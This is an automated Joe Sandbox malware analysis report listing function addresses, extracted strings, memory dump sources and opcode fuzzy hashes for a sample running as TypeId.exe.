Non-executed Functions

Function 00007FF8489B6331 Relevance: 1.7, Strings: 1, Instructions: 479COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF8489B633C

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 7dd02d6288ef231fd014395ad967ee54dc85aa64cefa2f83492850562691caf1
Instruction ID: b585880b4c69259dbdd7a9b8c8235cf10084ec530dbca6901c1cecab2b0052b8
Opcode Fuzzy Hash: 7dd02d6288ef231fd014395ad967ee54dc85aa64cefa2f83492850562691caf1
Instruction Fuzzy Hash: BAF1F421E0CD4A9FEB99EA285459779BBD2FFA5781F4401B9D00CC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6477 Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF8489B6483

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 2e229d78ea8e05a1e63cdb6ee9ef204b11db3443fc1675c4816bace14d4d5643
Instruction ID: 4ff4e5d583fe47836f455996acca70c58ec26fd22ff9da38d5f5b72dde95ad97
Opcode Fuzzy Hash: 2e229d78ea8e05a1e63cdb6ee9ef204b11db3443fc1675c4816bace14d4d5643
Instruction Fuzzy Hash: 9CE1F421E0CD4A9FEB99EA285459779BBD2FFA5781F4401B9D00CC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B629D Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7caa6da09761c7aea2dcfac65c4594934b2a8ee97d3c8f2b774d9c67b19b59d6
Instruction ID: 8a47b0a3f58e8ce5a0811634e9593baf18137e246f601699d63e73873515e855
Opcode Fuzzy Hash: 7caa6da09761c7aea2dcfac65c4594934b2a8ee97d3c8f2b774d9c67b19b59d6
Instruction Fuzzy Hash: 22020321E0CE4A9FEB99EA289055675BBD2FFA5781F1401B8D00DC71C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B63A9 Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4961329472218eae2ce0e92600d124ff6a3b9e187b5ada6a06fbc343285e57e
Instruction ID: 8bcd1ad1109a5250bc828c1ce150f61dae1ef70482b468e673d4f99461058b5b
Opcode Fuzzy Hash: a4961329472218eae2ce0e92600d124ff6a3b9e187b5ada6a06fbc343285e57e
Instruction Fuzzy Hash: 69F1F221E0CD4A9FEB99EA285459779BBD2FFA5781F4401B9D00DC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A82F10 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140660024.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848a80000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fd6660030f70c44752cd10a8b03bc1bc48f4c34a4dfa58212866f4f222997c
Instruction ID: 13520eaae080b11fc24b98a0ffa56c3580a445c138b3a39091086d6af2e12747
Opcode Fuzzy Hash: 60fd6660030f70c44752cd10a8b03bc1bc48f4c34a4dfa58212866f4f222997c
Instruction Fuzzy Hash: C2E1D16284E7C18FE7539778586A1617FB0AE13690B1E14EBC085CF0B3E69D580AC336

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B636D Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc85650d48e01fffd9707530066cade1979ca029841df005ebda73e3e7440af4
Instruction ID: 9bea358547290409190f4e8c3aaf9584fc2a6ce1a095b5401a56f678488c89a8
Opcode Fuzzy Hash: bc85650d48e01fffd9707530066cade1979ca029841df005ebda73e3e7440af4
Instruction Fuzzy Hash: 8CF1F421E0CD4A9FEB99EA285459775BBD2FFA5781F5401B9D00CC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6421 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c115f262593e524c72e297e694f64008635867311088d53953faed863e0acd18
Instruction ID: 12949b374dab31968445e875cd9e157730c8e2679075ab2060096c9442eda040
Opcode Fuzzy Hash: c115f262593e524c72e297e694f64008635867311088d53953faed863e0acd18
Instruction Fuzzy Hash: F4E1F321E0CD4A9FEB99EA285459779BBD2FFA5781F5401B9D00CC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B63E8 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385a7ddefcea206d337dd1b0195c73c109ed37b43f8a953fc1d3c82d4b05268c
Instruction ID: 1c6a2bb551b697e8a1a6919e7c1a05610dd8a3839377a2485cf4a8ca77e7cdaf
Opcode Fuzzy Hash: 385a7ddefcea206d337dd1b0195c73c109ed37b43f8a953fc1d3c82d4b05268c
Instruction Fuzzy Hash: 8AE1F321E0CD4A9FEB99EA285459779BBD2FFA5781F5401B9D00CC72C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B3BFB Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b053cada6ff5b46e5d3308dfb03a7a2cbf2756bfd5876a2fb0e40d5a539fdf55
Instruction ID: 19921bfc94d58547a5fea5645ae2f99afad5a1fe24131dd3446bc5055897276c
Opcode Fuzzy Hash: b053cada6ff5b46e5d3308dfb03a7a2cbf2756bfd5876a2fb0e40d5a539fdf55
Instruction Fuzzy Hash: D2C1B527B0D9711AD211BAFDB8465EEEB80DF817FBB084577D388C9093D918508A53E9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B630E Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc882b3f09978f57408125201fbe0c369651a94f2cb2517f00d8ea507468291
Instruction ID: 6e40ae93c68a4c2f8bb67b7c4c22e23333b2af17b90e78ca85cb04ed3da5264e
Opcode Fuzzy Hash: 6cc882b3f09978f57408125201fbe0c369651a94f2cb2517f00d8ea507468291
Instruction Fuzzy Hash: 5AE1F321E0CD4A9FEB9AEA285459775BBD2FFA5781F5400B9D00DC71C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6457 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723218264d241c3fa6d642ec1993e838c3bf400dd837488b95aa08bbfb977d60
Instruction ID: 6e40ae93c68a4c2f8bb67b7c4c22e23333b2af17b90e78ca85cb04ed3da5264e
Opcode Fuzzy Hash: 723218264d241c3fa6d642ec1993e838c3bf400dd837488b95aa08bbfb977d60
Instruction Fuzzy Hash: 5AE1F321E0CD4A9FEB9AEA285459775BBD2FFA5781F5400B9D00DC71C3CE28BC868745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B3C08 Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2389ed8924b0c73fff7ad49a4919bdb197ec8cdc4797065eae2048de085ee7
Instruction ID: b30460b5889fe7e41ca04e2be34034d4b8a5b3bac11ec0037d516445c1c0bb2d
Opcode Fuzzy Hash: bb2389ed8924b0c73fff7ad49a4919bdb197ec8cdc4797065eae2048de085ee7
Instruction Fuzzy Hash: 4DB1C627B0D9721AD211BAFDB8465EEEBD0DF817FBB084577D288C9093C91C508993E9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B3CD3 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf2feaf71237a927b3aa5e2aa7b1a09e8fc3c42eefce6e0017d019dd4d860fe
Instruction ID: 274c0840bcce5b6093eb5af97dc95235e27656070ba6d9ee7bb580f165cf03cf
Opcode Fuzzy Hash: bcf2feaf71237a927b3aa5e2aa7b1a09e8fc3c42eefce6e0017d019dd4d860fe
Instruction Fuzzy Hash: 48A1D427B0D9721AE211BAFDB8456EEABC0EF917FBB044577D24CC9083CD1C608652D9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A83424 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140660024.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848a80000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efdcbde37a1cb5bf64a2d8c9928d93809789b86303e459638d50246b1bc74da3
Instruction ID: b93243d53bb4cadd86568fae438820566aed51871fc0690a46f86aabe592f067
Opcode Fuzzy Hash: efdcbde37a1cb5bf64a2d8c9928d93809789b86303e459638d50246b1bc74da3
Instruction Fuzzy Hash: 8D81D6A284F7C14EE317A778282A1613FA09F13594B1E15EBC084CF4F3E689594AC336

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B3F9D Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3053351f1d5f1c1cb678dfe3decbcad46f6d928eaf51cf5c91a5b353ea5a6d05
Instruction ID: 0ce1efcd4ea3908c23ea8856772c3ed46f422cd54fe910d0f5803beaace089d4
Opcode Fuzzy Hash: 3053351f1d5f1c1cb678dfe3decbcad46f6d928eaf51cf5c91a5b353ea5a6d05
Instruction Fuzzy Hash: 0F71D8376089215BD311BAFDF8859FEFB90DF817BAB04457BD2C9CD043CA18A09A92D5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B3FD3 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb0888a419aca6e73b66620df04a0d18e5bf2856de61cb0c3c15f3d9bd3fae6
Instruction ID: eb19e57deb500f4bb79dc75134435668dfe211c009392afe013bed9484af269c
Opcode Fuzzy Hash: 4eb0888a419aca6e73b66620df04a0d18e5bf2856de61cb0c3c15f3d9bd3fae6
Instruction Fuzzy Hash: DA71B6277089215BD310BAFDF8855FEFB90DF817BAB08457BC2C9C9043CA18A49A96D4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B76AC Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b268a893c4565c82601be7ea785a67100d18829bfd83d89faf23d36f222b1feb
Instruction ID: 8651db3e598589f3d9ea20023ead2cca672c1269cda6f7488c0aee5f4737d3f4
Opcode Fuzzy Hash: b268a893c4565c82601be7ea785a67100d18829bfd83d89faf23d36f222b1feb
Instruction Fuzzy Hash: 4161E46180D7C59FD7178B7488AA5617FF0EF63310F0A41EBC485CB1E3DA28684AD762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1793 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140002787.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8489b0000_9NBx4Vmiuj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd71ac537948d476773f94e9a282ebb28012e78ab4e359226aeec2d24c6929c
Instruction ID: b53462c51d8f7e51ebdab9e2cf3c1061edad5eaef0ad47c4e45939723b4bb5bd
Opcode Fuzzy Hash: acd71ac537948d476773f94e9a282ebb28012e78ab4e359226aeec2d24c6929c
Instruction Fuzzy Hash: 4A413BB290DB889FE3858F3858593A63FE0EBE7381F5510FBC44CCB2D6DA2849468710

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: TypeId.exePID: 1248, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.7%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8489E5648 Relevance: 5.2, Strings: 3, Instructions: 1486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UFN, xrefs: 00007FF8489E8A6F
UFN, xrefs: 00007FF8489E89CD
s%, xrefs: 00007FF8489E9B9A

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$ UFN$s%
API String ID: 0-1940346416
Opcode ID: a41151c897f5ccae43d8a1bdb005c890edeb145685b5dfd081d3392eb2e6fcc3
Instruction ID: b5706faf4b52873ce04e32f62fc66fe4b687a018d4ccedcf8a156ce97c38a579
Opcode Fuzzy Hash: a41151c897f5ccae43d8a1bdb005c890edeb145685b5dfd081d3392eb2e6fcc3
Instruction Fuzzy Hash: AFB2B330A0CA498FDB99EF18C494BB97FF2FF59341F1440A9C44EDB296CA35A885CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E83F8 Relevance: 4.6, Strings: 3, Instructions: 865
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@TFN, xrefs: 00007FF8489EE4F0
@TFN, xrefs: 00007FF8489EE54E
@TFN, xrefs: 00007FF8489EE560

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: @TFN$@TFN$@TFN
API String ID: 0-2855753319
Opcode ID: 374e6adc3372de419de44e46bcb167b46235f589da28c2963dea992075506dfd
Instruction ID: 91c077d3cadafbaabf9f9877f30faee67bb59b322ddef7f70deb8d3905606f3e
Opcode Fuzzy Hash: 374e6adc3372de419de44e46bcb167b46235f589da28c2963dea992075506dfd
Instruction Fuzzy Hash: 1B523D30A1CA4A8FDB98EB28C458B797BE1FF99741F1445BAE04DC72A6DE34E841C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E5628 Relevance: 3.4, Strings: 2, Instructions: 884COMMON

Download Yara Rule

Strings

(UFN, xrefs: 00007FF8489F0E38
UFN, xrefs: 00007FF8489F1038

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$(UFN
API String ID: 0-1732257450
Opcode ID: c735dee29fd70f8e353e723b9e9a1c9a4ee52137aef1e0fd3fa064d1de441923
Instruction ID: 18c850783a8642c62563d2bc9fdfad6f3ea247964d855f92d75642040ad9c47a
Opcode Fuzzy Hash: c735dee29fd70f8e353e723b9e9a1c9a4ee52137aef1e0fd3fa064d1de441923
Instruction Fuzzy Hash: 9F52E431A1CE4A9FEB99FB288449679BBE1FF98341F44057DD54EC3282DF28B8418785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489ECAD0 Relevance: 3.4, Strings: 2, Instructions: 854COMMON

Download Yara Rule

Strings

@TFN, xrefs: 00007FF8489ECC16
UFN, xrefs: 00007FF8489ECF2E

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: UFN$@TFN
API String ID: 0-2551223153
Opcode ID: 021d076c63f70e42d53550dee356d54e673996a5e0789cd598ef1d87a6fbb4d4
Instruction ID: b7a2ee3ab6849dbefaa7673737c2396deb1985ee6a4bb017a2af85017e828087
Opcode Fuzzy Hash: 021d076c63f70e42d53550dee356d54e673996a5e0789cd598ef1d87a6fbb4d4
Instruction Fuzzy Hash: 4142AF3061CD098FDB98EB2CD459B797BD1EF99352F0500BAE44EC72A2DE28EC518745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A81B44 Relevance: 2.3, Strings: 1, Instructions: 1002COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848A81EF9

Memory Dump Source

Source File: 00000002.00000002.2165480680.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848a80000_TypeId.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 25fdb209f1bb2dce29ab30302e3af9d173dd46ca2eb27f725a662c39b46aaa39
Instruction ID: a01292ec779975cdbed3eafb34d2a10cfdfb1fb2796466a569a572a04389f7c7
Opcode Fuzzy Hash: 25fdb209f1bb2dce29ab30302e3af9d173dd46ca2eb27f725a662c39b46aaa39
Instruction Fuzzy Hash: 3D52E721E0EE8A1FE3E5F72C146A23526D2EF95685F5905BAC04DC32D7EE5CDC06432A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848A16FBD Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FF848A1704E

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489f5000_TypeId.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: d5ae49b48671b840c5e3a263d546a5e2930fc093b5d300b3c2d49b9c59db211d
Instruction ID: 4a1e0649139857570457f782f757c375c05625789cc64e052bd004bcd60bfbff
Opcode Fuzzy Hash: d5ae49b48671b840c5e3a263d546a5e2930fc093b5d300b3c2d49b9c59db211d
Instruction Fuzzy Hash: 7021B97190DB484FDB19EF68985A6F97BE0EB55321F04417FD08AC3292DB746805C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1BA9 Relevance: .7, Instructions: 666COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b0000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e141513b570421bdb8198d4839ad4188c2e37eae7cf9ed4c9d4e9a8c824137c
Instruction ID: b35eaf67664a592d5b67cf4c75faf6ab215b5da49fcfae5b9c8447f3e985434f
Opcode Fuzzy Hash: 0e141513b570421bdb8198d4839ad4188c2e37eae7cf9ed4c9d4e9a8c824137c
Instruction Fuzzy Hash: 7D12E031A0CE0D4FD758EA68C84A67877E1FFA5341F2402B9C99FC7296DE24AC438785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B1AE6 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b0000_TypeId.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4e636715767e054d419eb501c3d9d74f1cc4cc446bcc83667a5b4342965798
Instruction ID: 53ba29b412baae23623859689e883dde5356b272f90613c7270ce3d0e49fc4f0
Opcode Fuzzy Hash: 0f4e636715767e054d419eb501c3d9d74f1cc4cc446bcc83667a5b4342965798
Instruction Fuzzy Hash: 0422E530A0CD498FDB98EB58C4596687BE1FFA9352F0401BAD44DC76A2DF38AC85CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B4A55 Relevance: 26.4, Strings: 20, Instructions: 1372
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(AFN, xrefs: 00007FF8489B4FDC
9FN, xrefs: 00007FF8489B4B33
(AFN, xrefs: 00007FF8489B5384
(AFN, xrefs: 00007FF8489B502A
(AFN, xrefs: 00007FF8489B5114
(AFN, xrefs: 00007FF8489B524C
(AFN, xrefs: 00007FF8489B529A
(AFN, xrefs: 00007FF8489B5078
XAFN, xrefs: 00007FF8489B4DDE
(AFN, xrefs: 00007FF8489B4F87
xNFN, xrefs: 00007FF8489B4B60
hAFN, xrefs: 00007FF8489B4E5B
(AFN, xrefs: 00007FF8489B52E8
XNFN, xrefs: 00007FF8489B4DA2
(AFN, xrefs: 00007FF8489B51B0
(AFN, xrefs: 00007FF8489B5336
(AFN, xrefs: 00007FF8489B51FE
(AFN, xrefs: 00007FF8489B50C6
(AFN, xrefs: 00007FF8489B5162
(AFN, xrefs: 00007FF8489B53CF

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: (AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$(AFN$XAFN$XNFN$hAFN$xNFN$9FN
API String ID: 0-4069044475
Opcode ID: 2d49f05f83321a6078b83eed0ae3478da33164bd327b42c8a7d115de98966869
Instruction ID: a81b094f607923f590ddd5d48420331c0fc1fa5d6432c4c8a8163e7c5b0ef629
Opcode Fuzzy Hash: 2d49f05f83321a6078b83eed0ae3478da33164bd327b42c8a7d115de98966869
Instruction Fuzzy Hash: 7392C721A0DE8A4FE789EB2884597747BE1FF96781F0401FBD44DCB297DE286C898705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B15A9 Relevance: 14.1, Strings: 11, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9FN, xrefs: 00007FF8489B16FA
X9FN, xrefs: 00007FF8489B1689
(9FN, xrefs: 00007FF8489B1830
09FN, xrefs: 00007FF8489B18E2
@9FN, xrefs: 00007FF8489B17F8
`9FN, xrefs: 00007FF8489B18D5
x9FN, xrefs: 00007FF8489B18BB
89FN, xrefs: 00007FF8489B18EF
P9FN, xrefs: 00007FF8489B173A
p9FN, xrefs: 00007FF8489B18C8
h9FN, xrefs: 00007FF8489B17B9

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b0000_TypeId.jbxd

Similarity

API ID:
String ID: (9FN$09FN$89FN$@9FN$H9FN$P9FN$X9FN$`9FN$h9FN$p9FN$x9FN
API String ID: 0-3387171174
Opcode ID: d36771e29cf94fd1b736b7d9e5857a35a671130ba141277fef19abfb43c049f4
Instruction ID: acd5886c082b24565f88927c12da22a5734d0e62705e11272948d720f9385a22
Opcode Fuzzy Hash: d36771e29cf94fd1b736b7d9e5857a35a671130ba141277fef19abfb43c049f4
Instruction Fuzzy Hash: 1EB18F6290DBCA5FE7469F3888183A9BFF1EF97791F1400EBC449CB2D7DA2918498711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B5B12 Relevance: 9.5, Strings: 7, Instructions: 748
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xAFN, xrefs: 00007FF8489B5BD9
XAFN, xrefs: 00007FF8489B5B54
hAFN, xrefs: 00007FF8489B5DF5
hAFN, xrefs: 00007FF8489B603A
hAFN, xrefs: 00007FF8489B5D1E
hAFN, xrefs: 00007FF8489B6165
NFN, xrefs: 00007FF8489B5F28

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: XAFN$hAFN$hAFN$hAFN$hAFN$xAFN$NFN
API String ID: 0-3965960871
Opcode ID: 4b46d5dac99936fb29bc68d75ca94bd6c44c981c7a1d70b872553d6c26f8518d
Instruction ID: 69545731695aa74dadf8685bf19ffa612c749cc984e618778e9685a72211f51b
Opcode Fuzzy Hash: 4b46d5dac99936fb29bc68d75ca94bd6c44c981c7a1d70b872553d6c26f8518d
Instruction Fuzzy Hash: E9328531E1DE4A5FDB89FF2884556A8BBA2FFA5781F1401F9D00DC7287CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E3C78 Relevance: 5.3, Strings: 4, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0UFN, xrefs: 00007FF8489E6978
0UFN, xrefs: 00007FF8489E6B5F
;&, xrefs: 00007FF8489E6B51, 00007FF8489E6BC3
0UFN, xrefs: 00007FF8489E6A74

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: 0UFN$0UFN$0UFN$;&
